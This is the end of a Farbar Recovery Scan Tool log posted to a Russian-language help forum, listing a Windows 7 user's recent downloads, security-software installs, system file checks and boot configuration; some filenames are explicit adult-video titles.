2018-01-28 15:12 - 2018-01-28 19:57 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-01-27 22:00 - 2018-01-27 22:00 - 000000000 ____D C:\Android
2018-01-27 21:58 - 2018-01-27 21:58 - 000000000 ____D C:\.Trash
2018-01-27 21:22 - 2018-01-27 21:22 - 000068399 _____ C:\Users\Markus\Downloads\Remix_OS_for_PC_Android_M_32bit_B2016112201.torrent
2018-01-27 05:07 - 2018-01-27 05:10 - 532928944 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\PhoenixOSInstaller-v1.2.3-277.exe
2018-01-26 22:20 - 2018-01-27 00:14 - 652395424 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\PhoenixOSInstaller_v2.5.8.364_x86_x64.exe
2018-01-26 16:32 - 2018-01-26 23:14 - 610979232 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\PhoenixOSInstaller_v2.5.3.310_x86_x64.exe
2018-01-26 16:28 - 2018-01-26 22:18 - 652395424 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\Не подтвержден 935984.crdownload
2018-01-17 02:27 - 2018-01-17 02:27 - 000011481 _____ C:\Users\Markus\Downloads\[NNM-Club.name]_SpyHunter 4.28.5.4848 RePack (& Portable) by D!akov (09.09.2017).torrent
2018-01-13 14:31 - 2018-01-13 14:31 - 000020582 _____ C:\Users\Markus\Downloads\National Geographic Auto SOS АВТО SOS (1 Сезон,10 серий из 10) [2012, Документальный, SATRip] [rutracker-4742232].torrent
2018-01-13 13:31 - 2018-01-13 13:31 - 000106791 _____ C:\Users\Markus\Downloads\Авто SOS 2 3 4 5 сезон Auto Car SOS (National Geographic Channel) [2013, 2014, 2015, 2016, 2017 Реалити авто шоу, HDTVRip] [rutracker-5057446].torrent
2018-01-10 10:23 - 2018-01-10 10:23 - 000000000 _____ C:\Windows\system32\Tmp7139.tmp
2018-01-03 21:39 - 2018-01-03 21:39 - 000064555 _____ C:\Users\Markus\Downloads\Американские колымаги - 1 сезон American Hot Rod (Discovery) [2004, документальный, TVRip] [rutracker-2641718] (1).torrent
2017-12-28 02:25 - 2017-12-28 02:25 - 076638208 _____ C:\Users\Markus\Downloads\xhamster.com_8656881_mom_not_her_real_daughter_lesbians_240p.mp4
2017-12-28 01:19 - 2017-12-28 01:19 - 002007500 _____ C:\Users\Markus\Downloads\xhamster.com_7399526_self_pee_she_urinates_in_her_mouth_240p.mp4
2017-12-27 16:17 - 2017-12-27 16:17 - 000063521 _____ C:\Users\Markus\Downloads\Amerikanskie_kolyimagi sezon 1[NNM-club].torrent
2017-12-27 16:15 - 2017-12-27 16:15 - 000064555 _____ C:\Users\Markus\Downloads\Американские колымаги - 1 сезон American Hot Rod (Discovery) [2004, документальный, TVRip] [rutracker-2641718].torrent
2017-12-14 20:20 - 2017-12-14 20:20 - 000001922 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2017-12-14 20:20 - 2017-12-14 20:20 - 000000000 ____D C:\Users\Markus\AppData\Roaming\AVAST Software
2017-12-14 20:20 - 2017-12-14 20:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2017-12-14 20:19 - 2017-12-14 20:30 - 000969184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2017-12-14 20:19 - 2017-12-14 20:30 - 000513632 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2017-12-14 20:19 - 2017-12-14 20:30 - 000293352 _____ (AVAST Software) C:\Windows\system32\Drivers\aswvmm.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000391496 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-12-14 20:19 - 2017-12-14 20:19 - 000163416 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000108816 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000000000 ____D C:\Program Files\AVAST Software
2017-12-14 20:18 - 2017-12-14 20:18 - 000000000 ____D C:\Users\Все пользователи\AVAST Software
2017-12-14 20:18 - 2017-12-14 20:18 - 000000000 ____D C:\ProgramData\AVAST Software
2017-12-14 20:00 - 2017-12-14 20:03 - 000455384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys.151327106936904
2017-12-14 19:09 - 2017-12-14 19:13 - 000455384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys.151326806415404
2017-12-14 19:08 - 2017-12-14 19:08 - 000053208 _____ (AVAST Software) C:\Windows\avastSS.scr
2017-12-11 19:40 - 2017-12-11 19:40 - 000001870 _____ C:\Users\Public\Desktop\COMODO Firewall.lnk
2017-12-11 19:40 - 2017-12-11 19:40 - 000000000 ____D C:\Windows\System32\Tasks\COMODO
2017-12-11 19:40 - 2017-12-11 19:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\COMODO
2017-12-11 19:39 - 2017-12-11 19:40 - 000000000 ___SD C:\Users\Все пользователи\Shared Space
2017-12-11 19:39 - 2017-12-11 19:40 - 000000000 ___SD C:\ProgramData\Shared Space
2017-12-11 19:39 - 2017-12-11 19:39 - 000000000 ____D C:\Program Files\COMODO
2017-12-11 19:36 - 2017-12-11 19:36 - 000000000 ____D C:\Users\Все пользователи\Comodo Downloader
2017-12-11 19:36 - 2017-12-11 19:36 - 000000000 ____D C:\ProgramData\Comodo Downloader
2017-12-11 19:19 - 2017-12-11 19:40 - 000000000 ____D C:\Users\Все пользователи\Comodo
2017-12-11 19:19 - 2017-12-11 19:40 - 000000000 ____D C:\ProgramData\Comodo
2017-12-11 19:13 - 2017-12-11 19:13 - 000268464 _____ C:\Users\Markus\Downloads\viewtopic_Comodo Firewall 2014 7.0.313494.4115 Final [Multi_Ru].htm
2017-12-11 19:13 - 2017-12-11 19:13 - 000000000 ____D C:\Users\Markus\Downloads\viewtopic_Comodo Firewall 2014 7.0.313494.4115 Final [Multi_Ru]_files
2017-12-11 18:11 - 2017-12-11 18:11 - 000018378 _____ C:\Users\Markus\Downloads\[NNM-Club.me]_Comodo Firewall 2014 7.0.313494.4115 Final.exe (1).torrent
2017-12-11 17:22 - 2017-12-11 17:22 - 000018378 _____ C:\Users\Markus\Downloads\[NNM-Club.me]_Comodo Firewall 2014 7.0.313494.4115 Final.exe.torrent
2017-12-11 10:54 - 2017-12-11 10:54 - 000018613 _____ C:\Users\Markus\Downloads\[rutor.is]Comodo_Firewall_7.0.317799.4142.exe.torrent
2017-12-11 02:24 - 2017-12-14 20:17 - 000000000 ____D C:\Users\Markus\Documents\Резервные копии реестра CCleaner
2017-12-10 23:56 - 2017-12-10 23:56 - 004928780 _____ C:\Users\Markus\Downloads\COMODO Products Uninstaller.rar
2017-12-10 23:42 - 2017-12-10 23:43 - 000037483 _____ C:\Users\Markus\Downloads\[NNM-Club.me]_AV Uninstall Tools Pack 2014.06.torrent
2017-12-10 15:20 - 2017-12-10 15:21 - 069534888 _____ (COMODO) C:\Users\Markus\Downloads\cispremium_only_installer.exe
2017-12-10 15:05 - 2017-12-10 15:05 - 005500784 _____ (COMODO) C:\Users\Markus\Downloads\cav_installer.exe
2017-12-10 14:38 - 2017-12-10 14:38 - 008893232 _____ (AVAST Software) C:\Users\Markus\Downloads\avastclear.exe
2017-12-10 13:41 - 2017-12-10 13:41 - 000000000 ____D C:\Windows\System32\Tasks\Avast Software
2017-12-10 13:39 - 2017-12-10 13:39 - 000000000 ____D C:\Program Files\Common Files\Avast Software
2017-12-10 13:34 - 2017-12-10 14:23 - 000000000 _____ C:\Windows\SysWOW64\last.dump
2017-12-10 13:27 - 2018-01-09 20:20 - 000003920 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-12-09 14:37 - 2017-12-09 14:37 - 000000000 _____ C:\Windows\system32\TmpD7C7.tmp
2017-12-07 16:14 - 2017-12-07 16:14 - 000000000 _____ C:\Windows\system32\Tmp69F8.tmp
2017-12-06 18:18 - 2017-12-06 18:18 - 000000000 _____ C:\Windows\system32\Tmp692D.tmp
2017-11-30 22:33 - 2017-11-30 22:33 - 000001179 _____ C:\Users\Markus\Desktop\AIDA64 Extreme.lnk
2017-11-30 22:33 - 2017-11-30 22:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FinalWire
2017-11-30 22:33 - 2017-11-30 22:33 - 000000000 ____D C:\Program Files (x86)\FinalWire
2017-11-28 19:37 - 2017-11-28 19:37 - 000000000 _____ C:\Windows\system32\Tmp8822.tmp
2017-11-26 15:29 - 2017-11-26 15:29 - 000000000 _____ C:\Windows\system32\Tmp5A6E.tmp
2017-11-21 22:55 - 2017-11-21 22:55 - 000326743 _____ C:\Users\Markus\Downloads\Как накрутить очки влияния в War robots.htm
2017-11-21 22:55 - 2017-11-21 22:55 - 000000000 ____D C:\Users\Markus\Downloads\Как накрутить очки влияния в War robots_files
2017-11-20 14:58 - 2017-11-20 14:58 - 000000000 _____ C:\Windows\system32\Tmp8610.tmp
2017-11-17 18:32 - 2017-11-17 18:32 - 000000000 _____ C:\Windows\system32\Tmp94A0.tmp
2017-11-17 17:03 - 2017-11-17 17:03 - 000000000 _____ C:\Windows\system32\Tmp8B3E.tmp
2017-11-15 16:15 - 2017-11-15 16:15 - 000000000 _____ C:\Windows\system32\Tmp5B97.tmp
2017-11-10 14:06 - 2017-11-10 14:06 - 000000000 _____ C:\Windows\system32\Tmp7E53.tmp
 
==================== Three Months Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-02-07 16:29 - 2009-07-14 07:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-02-07 16:29 - 2009-07-14 07:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-02-07 16:22 - 2013-10-04 16:03 - 000000000 ____D C:\Users\Все пользователи\VMware
2018-02-07 16:22 - 2013-10-04 16:03 - 000000000 ____D C:\ProgramData\VMware
2018-02-07 16:22 - 2012-12-17 19:45 - 000000000 ____D C:\Users\Все пользователи\NVIDIA
2018-02-07 16:22 - 2012-12-17 19:45 - 000000000 ____D C:\ProgramData\NVIDIA
2018-02-07 16:20 - 2017-07-20 22:00 - 000000248 _____ C:\Windows\SysWOW64\PARTIZAN.TXT
2018-02-07 16:20 - 2009-07-14 08:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-02-07 13:14 - 2013-09-28 16:40 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.ini
2018-02-07 11:13 - 2013-09-28 18:57 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.bak
2018-02-07 02:58 - 2013-09-28 18:57 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.bk!
2018-02-06 10:31 - 2013-09-28 18:59 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.bko
2018-02-05 19:05 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\inf
2018-02-05 19:01 - 2012-12-20 22:00 - 000000000 ____D C:\Users\Markus\AppData\Roaming\uTorrent
2018-02-05 12:41 - 2017-08-02 14:38 - 000000000 ____D C:\Users\Markus\AppData\Roaming\IP-TV Player
2018-02-04 14:20 - 2011-04-12 16:26 - 000738622 _____ C:\Windows\system32\perfh019.dat
2018-02-04 14:20 - 2011-04-12 16:26 - 000158066 _____ C:\Windows\system32\perfc019.dat
2018-02-04 14:20 - 2009-07-14 08:13 - 001696786 _____ C:\Windows\system32\PerfStringBackup.INI
2018-02-02 12:36 - 2009-07-14 08:08 - 000032532 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2018-01-31 15:35 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\rescache
2018-01-31 04:21 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\Help
2018-01-29 19:15 - 2016-12-05 22:10 - 000000000 ____D C:\Users\Markus\AppData\Local\NVIDIA Corporation
2018-01-29 19:15 - 2013-10-10 17:43 - 000000000 ____D C:\Users\Markus\AppData\Local\NVIDIA
2018-01-29 19:15 - 2012-12-17 19:45 - 000000000 ____D C:\Users\Все пользователи\NVIDIA Corporation
2018-01-29 19:15 - 2012-12-17 19:45 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-01-29 19:15 - 2012-12-17 19:45 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-01-29 19:15 - 2012-12-17 19:44 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-01-29 19:14 - 2016-12-05 22:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-01-29 18:59 - 2016-11-11 02:31 - 000000000 ____D C:\Users\Все пользователи\Tunngle
2018-01-29 18:59 - 2016-11-11 02:31 - 000000000 ____D C:\ProgramData\Tunngle
2018-01-29 18:50 - 2013-10-04 16:23 - 000000000 ____D C:\Users\Markus\AppData\Roaming\VMware
2018-01-29 18:44 - 2009-07-14 08:32 - 000000000 ____D C:\Windows\system32\FxsTmp
2018-01-29 18:40 - 2013-10-04 16:23 - 000000000 ____D C:\Users\Markus\AppData\Local\VMware
2018-01-29 12:14 - 2013-03-04 20:29 - 000000000 ____D C:\Temp
2018-01-29 02:20 - 2016-10-22 15:36 - 000000466 _____ C:\Users\Markus\AppData\Roaming\prio.ini
2018-01-28 21:36 - 2009-07-14 08:32 - 000000000 ____D C:\Program Files\DVD Maker
2018-01-28 19:57 - 2016-10-06 17:27 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-01-28 18:36 - 2012-12-17 20:57 - 000001876 _____ C:\Users\Markus\Documents\ax_files.xml
2018-01-28 18:32 - 2017-07-20 18:26 - 000000000 ____D C:\Users\Public\Documents\regruninfo
2018-01-28 18:10 - 2017-07-20 18:00 - 000000000 ____D C:\Users\Markus\Documents\RegRun2
2018-01-28 18:09 - 2017-07-20 18:42 - 000000000 ____D C:\Users\Все пользователи\RegRun
2018-01-28 18:09 - 2017-07-20 18:42 - 000000000 ____D C:\ProgramData\RegRun
2018-01-27 23:59 - 2012-12-18 20:39 - 000000000 ____D C:\Users\Markus\AppData\Local\Mozilla
2018-01-27 16:16 - 2012-12-28 02:02 - 000056712 _____ C:\Users\Markus\Desktop\Новый текстовый документ.txt
2018-01-27 00:59 - 2012-12-18 21:10 - 000000000 ____D C:\Users\Markus\AppData\Roaming\Media Player Classic
2018-01-27 00:58 - 2016-12-06 18:07 - 000000000 ____D C:\Users\Markus\AppData\Local\CrashDumps
2018-01-26 13:37 - 2017-09-29 18:25 - 000001129 _____ C:\Users\Markus\Desktop\Facebook Gameroom.lnk
2018-01-26 13:37 - 2017-09-29 18:25 - 000000000 ____D C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2018-01-26 13:37 - 2017-09-29 18:25 - 000000000 ____D C:\Users\Markus\AppData\Local\Facebook
2018-01-24 22:12 - 2017-08-05 14:10 - 000002501 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MWO Portal.lnk
2018-01-24 22:12 - 2017-08-05 14:10 - 000002489 _____ C:\Users\Public\Desktop\MWO Portal.lnk
2018-01-18 23:20 - 2017-07-25 22:40 - 000000000 ____D C:\Kaspersky Rescue Disk 10.0
2018-01-16 16:38 - 2017-07-27 10:47 - 000000078 _____ C:\Windows\system32\ps
2018-01-16 16:38 - 2017-06-29 11:20 - 000000076 _____ C:\Windows\system32\p
2018-01-16 16:38 - 2017-06-29 11:20 - 000000060 _____ C:\Windows\system32\s
2018-01-16 13:18 - 2017-06-28 22:38 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
 
==================== Files in the root of some directories =======
 
2016-10-22 15:36 - 2018-01-29 02:20 - 000000466 _____ () C:\Users\Markus\AppData\Roaming\prio.ini
2013-09-28 18:57 - 2018-02-07 11:13 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.bak
2013-09-28 18:57 - 2018-02-07 02:58 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.bk!
2013-09-28 18:59 - 2018-02-06 10:31 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.bko
2013-09-28 16:40 - 2018-02-07 13:14 - 000014243 _____ () C:\Users\Markus\AppData\Roaming\PStrip.ini
2013-01-20 21:28 - 2014-01-13 05:06 - 000037888 _____ () C:\Users\Markus\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-01-30 04:28 - 2016-11-29 16:33 - 000000075 _____ () C:\Users\Markus\AppData\Local\fusioncache.dat
2017-07-12 10:11 - 2017-07-12 10:11 - 000000523 _____ () C:\Users\Markus\AppData\Local\Nox_crash.log
2013-10-11 16:10 - 2013-10-11 16:10 - 000007606 _____ () C:\Users\Markus\AppData\Local\Resmon.ResmonCfg
2017-10-26 22:11 - 2017-10-26 22:11 - 000000000 _____ () C:\Users\Markus\AppData\Local\{5579B7AA-4F5C-40CA-9063-09B36CF11597}
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== BCD ================================
 
Диспетчер загрузки Windows
--------------------
идентификатор           {bootmgr}
device                  partition=\Device\HarddiskVolume1
description             Windows Boot Manager
locale                  ru-RU
inherit                 {globalsettings}
default                 {current}
resumeobject            {e45e6547-4852-11e2-a9a9-85e3a09781bf}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30
 
Загрузка Windows
-------------------
идентификатор           {18b27302-3b02-11e2-a37e-d7ac3651fabf}
device                  ramdisk=[C:]\Recovery\18b27302-3b02-11e2-a37e-d7ac3651fabf\Winre.wim,{18b27303-3b02-11e2-a37e-d7ac3651fabf}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[C:]\Recovery\18b27302-3b02-11e2-a37e-d7ac3651fabf\Winre.wim,{18b27303-3b02-11e2-a37e-d7ac3651fabf}
systemroot              \windows
nx                      OptIn
winpe                   Yes
 
Загрузка Windows
-------------------
идентификатор           {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 7
locale                  ru-RU
inherit                 {bootloadersettings}
recoverysequence        {e45e6549-4852-11e2-a9a9-85e3a09781bf}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {e45e6547-4852-11e2-a9a9-85e3a09781bf}
nx                      OptOut
usefirmwarepcisettings  No
 
Загрузка Windows
-------------------
идентификатор           {e45e6549-4852-11e2-a9a9-85e3a09781bf}
device                  ramdisk=[C:]\Recovery\e45e6549-4852-11e2-a9a9-85e3a09781bf\Winre.wim,{e45e654a-4852-11e2-a9a9-85e3a09781bf}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[C:]\Recovery\e45e6549-4852-11e2-a9a9-85e3a09781bf\Winre.wim,{e45e654a-4852-11e2-a9a9-85e3a09781bf}
systemroot              \windows
nx                      OptIn
winpe                   Yes
 
Загрузка Windows
-------------------
идентификатор           {f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9}
device                  ramdisk=[C:]\Recovery\f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9\Winre.wim,{f25ad1d1-6ae8-11e1-8359-b1e7f913d2b9}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[C:]\Recovery\f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9\Winre.wim,{f25ad1d1-6ae8-11e1-8359-b1e7f913d2b9}
systemroot              \windows
nx                      OptIn
winpe                   Yes
 
Возобновление из режима гибернации
--------------------------
идентификатор           {e45e6547-4852-11e2-a9a9-85e3a09781bf}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  ru-RU
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No
 
Тестер памяти Windows
---------------------
идентификатор           {memdiag}
device                  partition=\Device\HarddiskVolume1
path                    \boot\memtest.exe
description             Диагностика памяти
locale                  ru-RU
inherit                 {globalsettings}
badmemoryaccess         Yes
 
Параметры EMS
-------------
идентификатор           {emssettings}
bootems                 Yes
 
Параметры отладчика
-------------------
идентификатор           {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200
 
Дефекты ОЗУ
-----------
идентификатор           {badmemory}
 
Глобальные параметры
--------------------
идентификатор           {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}
 
Параметры загрузчика
--------------------
идентификатор           {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}
 
Параметры гипервизора
-------------------
идентификатор           {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200
 
Параметры загрузчика возобновления
-----------------------------------
идентификатор           {resumeloadersettings}
inherit                 {globalsettings}
 
Параметры устройства
-------------------
идентификатор           {18b27303-3b02-11e2-a37e-d7ac3651fabf}
description             Ramdisk Options
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\18b27302-3b02-11e2-a37e-d7ac3651fabf\boot.sdi
 
Параметры устройства
-------------------
идентификатор           {e45e654a-4852-11e2-a9a9-85e3a09781bf}
description             Ramdisk Options
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\e45e6549-4852-11e2-a9a9-85e3a09781bf\boot.sdi
 
Параметры устройства
-------------------
идентификатор           {f25ad1d1-6ae8-11e1-8359-b1e7f913d2b9}
description             Ramdisk Options
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\f25ad1d0-6ae8-11e1-8359-b1e7f913d2b9\boot.sdi
 
 
LastRegBack: 2018-01-31 15:26
 
==================== End of FRST.txt ============================

Total posts: 109 | Registered: 14-03-2011 | Posted: 17:25 07-02-2018 | Edited: markusMj, 17:31 07-02-2018